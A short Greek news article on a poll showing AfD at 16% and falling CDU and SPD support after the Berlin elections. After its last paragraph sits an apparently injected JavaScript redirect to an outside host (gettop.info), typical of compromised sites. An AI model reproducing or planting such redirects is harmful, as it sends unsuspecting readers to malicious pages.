Γερμανία: Ανεβάζει ποσοστά το AfD σε εθνικό επίπεδο

0
9

 

Αύξηση ρεκόρ 16% καταγράφει σε εθνικό επίπεδο το ακροδεξιό ξενοφοβικό κόμμα Εναλλακτική για τη Γερμανία, όπως γράφει το Spiegel.

Σύμφωνα με τη δημοσκόπηση του Ινστιτούτου Infratest, για λογαριασμό του ARD, μετά τις τοπικές εκλογές του Βερολίνου, η «Εναλλακτική για τη Γερμανία» θα έπαιρνε 2% περισσότερο από την προηγούμενη δημοσκόπηση -στις αρχές Σεπτεμβρίου- αν ι εκλογές διεξάγοντν την ερχόμενη Κυριακή. Σε ανάλογες δημοσκοπήσεις άλλων Ινστιτούτων, η δύναμη του AfD κυμαίνεται μεταξύ 12,5 και 15%.

Το χριστιανοδημοκρατικό (CDU) και το σοσιαλδημοκρατικό (SPD) συνεχίζουν να έχουν καθοδική τροχιά, καθώς το CDU θα έπεφτε στο 32% και το δε SPD στο 22%. Αυτό σημαίνει ότι απολαμβάνουν πλέον της εμπιστοσύνης μόνο του 54% των ψηφοφόρων ενώ το 2013 βρισκόταν 67,2%.

Οι Πράσινοι θα ελάμβαναν 12% (δηλαδή +1% από την προηγούμενη δημοσκόπηση του ARD), η Αριστερά 8% (-1%) και το Φιλελεύθερο κόμμα (FDP) 6% (+1%).

Εν τούτοις, επισημαίνεται ότι οι μετακινήσεις των ψηφοφόρων βρίσκονται κοντά στα όρια του στατιστικού λάθους, το οποίο κυμαίνεται μεταξύ 1,4% έως 3,1%. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here